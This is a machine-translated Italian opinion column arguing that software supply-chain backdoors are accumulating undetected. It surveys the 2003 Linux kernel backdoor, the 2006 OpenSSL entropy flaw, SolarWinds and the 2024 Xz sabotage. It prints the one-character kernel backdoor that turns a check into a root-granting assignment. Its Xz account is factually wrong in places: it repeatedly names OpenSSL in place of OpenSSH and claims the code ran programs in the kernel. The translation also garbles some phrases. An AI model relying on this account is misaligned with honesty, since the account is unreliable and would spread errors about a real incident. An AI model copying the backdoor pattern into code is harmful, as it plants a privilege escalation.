Xz, Solarwinds and the coming Armageddon

This is a text automatically translated from Italian. If you appreciate our work and if you like reading it in your language, consider a donation to allow us to continue doing it and improving it.

The articles of Cassandra Crossing I'm under license CC BY-SA 4.0 | Cassandra Crossing is a column created by Marco Calamari with the "nom de plume" of Cassandra, born in 2005.

After the foiled sabotage of the Xz library, are we safe?

This article was written on April 5, 2024 from Cassandra

Cassandra Crossing 582/ Xz, Solarwinds and the coming Armageddon

The sabotage of the Xz library was foiled, and once again the good guys won. But are we sure that attacks on the software supply chain elsewhere have not succeeded without anyone noticing?

Reality forces Cassandra to further extend the “End of the World” series because new, very serious clues are emerging that the weapons for the coming IT Armageddon continue to accumulate.

And once again, gusts of optimism, also expressed by professionals, spread in a way that is as inexplicable as it is dangerous. Certainly not out of stupidity or incompetence; perhaps out of a desire for a quiet life, perhaps out of unjustified optimism,

But in order to fully and comprehensibly express her thesis, Cassandra is, as usual, forced to rewind the tape and narrate a bit of background.

Luckily we only need to rewind to 2003, the year in which the attempt to introduce a backdoor even in the Linux kernel.

An administrator of Repositories of the official sources noticed that a minimal modification made to a trivial kernel routine did not appear to be requested by anyone. Cassandra does not claim that C is the heritage of its readers, but just to illustrate the diabolical nature of the modification, it is the variation of a single character in a single line, that is, from

if ( (options == (__WCLONE|__WALL)) && (current->uid == 0))

to

if ( (options == (__WCLONE|__WALL)) && (current->uid = 0))

the lack of the last "=" meant that, for example, any user who had used the "kill" command with an appropriate parameter (a 16-bit value) would have found himself "promoted" to root, and therefore could have taken the complete control of the server.

The change was rolled back, the build server infrastructure was scrapped and rebuilt from scratch, and the source was reloaded from a backup.

Good 1, Bad 0.

But fast forward to 2006 to find yet another diabolical change in the OpenSSL library. Two simple commented lines they dramatically decreased the entropy of the library's RNG. To keep it simple here too, they ensured that, for example, the number of different cryptographic keys that could be generated by the library went from a practically infinite value to 32767. Anyone who had known this fact and pre-calculated the appropriate keys would have been able to force any cryptographic algorithm that used OpenSSL (i.e. practically everyone) with extreme ease.

When the problem was discovered and promptly resolved, its effects did not immediately cease. In fact it took over two years for the majority of “weak” keys, generated and spread throughout the internet, were replaced, which left the perpetrators of the crime a further two years to take advantage of its effects.

This event was so felt by the chroniclers of the time that even the XKCD comic dedicated an article to itwitty cartoon.

But let's move on, because unfortunately there is nothing to laugh about.

There were those who said Good 2 - Bad 0 and ball in the centre.

We will talk about the calculation of this score, which is the crux of Cassandra's reasoning, at the end of this statement.

Fast forward to 2020; a group of cybercriminals in the pay of a nation state attacks the network of a cybersecurity software manufacturer, probably as early as 2018. After violating the network, they alter the servers that compile the software intended to be shipped to customers so that included a backdoor.

We are not talking about any software, Solarwinds is a sophisticated computer security software, installed by the largest organizations with stringent security needs, including, for example, around twenty American government agencies, armaments suppliers, large IT companies and company singing. Yes, even in Italy.

L'Solarwind automatic update it had therefore automatically installed a backdoor that made it very easy to hack the networks that used it; in this way thousands of over-protected networks were suddenly opened to cyber criminals who were able to abuse them at will for years. When the attack was discovered (because it is an attack), the main problem for the affected organizations was to understand whether they had been violated or not, because the attackers were of the most dangerous type, the good ones, who do not get discovered and who it is very difficult to find and chase away.

And finally we arrive at 2024, today, or rather two weeks ago, and the attack on the Xz library.

A Microsoft employee who used OpenSSL (yes, her again) notices that the new version takes 500 milliseconds longer to complete certain operations compared to the previous version. Since he evidently had nothing better to do in his life and considered this problem important, he started checking the source codes to find the reason. To his amazement he realizes that the new version of the OpenSSL library contains a binary file coming from another library, to be precise Xz which is the library that is responsible for compressing and decompressing files; yes, the very one you use to zip your PDFs, whether you know it or not.

He realizes with horror that this modification allows those who possess certain cryptographic keys to inject and execute any program directly into the operating system kernel, and make anything happen; from taking complete control of the system to quickly and completely destroying all compromised servers.

Retrospective analysis of the events revealed that two years earlier an anonymous developer had started to propose changes to the Xz library, which were reasonable and therefore accepted by its administrator, and then to be accepted as co-administrator of the library itself. He had then slowly subverted the compilation system of the library itself, inserting the malicious code destined to end up in the OpenSSL library, and at the same time carrying out a sophisticated social engineering action against those who could have checked his modifications in such a way that these checks were not done.

Then, when the infected library began to spread to the first servers, one of them was that of the blessed Microsoft employee with a lot of free time, who we can never thank enough and who deserves a monument.

If this brief summary wasn't enough for you, you can have fun listening this podcast in which two titans of the Italian hacker scene of the 90s discuss the matter in depth and jokingly, also sharing an optimistic opinion for the future.

So Good 3 - Bad zero and ball in the centre?

Well, this assessment is what accompanied these terrifying events, which always came to light fortunately, and before they could cause catastrophic damage. In fact, Solarwind has indeed caused very significant economic damage and damage resulting from data theft and unspecified espionage activities, but it should have pushed the global IT community to take action against this new type of cyber attacks.

So Good 4 — Bad 0??

And we arrive at the conclusions, probably now very clear to the 24 well-informed readers of Cassandra.

For all the deities ever worshiped by humans, from Astarte to Zarathustra, including Manitu, Cthulhu and Yog-Setoth, it is possible that no one thinks of all the attacks of this magnitude which have never been detected? The ones where no sleepless employee has stumbled, which no curious system administrator has ever detected?

But are there really experts who believe that the good guys continue to score and that the bad guys are forced into their half of the pitch?

Can anyone really think that nation-states, weapons manufacturers, large and small criminal groups and mafias are not accumulating, in large and small arsenals, these "modifications" to the software that makes the world work, these cyber weapons that sometimes they have even been tested or used on a smaller scale or with limited consequences (don't the names SQL Slammer and Stuxnet mean anything to you?).

Cassandra has always been Andreottian at heart, and never more than in this case does he feel the duty to invite optimists to reconsider their positions, not out of a precautionary principle, but out of pure and simple realism.

The Armageddon of the first world cyber war is certainly, and I repeat certainly, in an advanced stage of realization. Then don't say I didn't warn you.

Marco Calamari

This tag @loyal alternatives is used to automatically send this post to Feddit and allow anyone on the fediverse to comment on it.

Join communities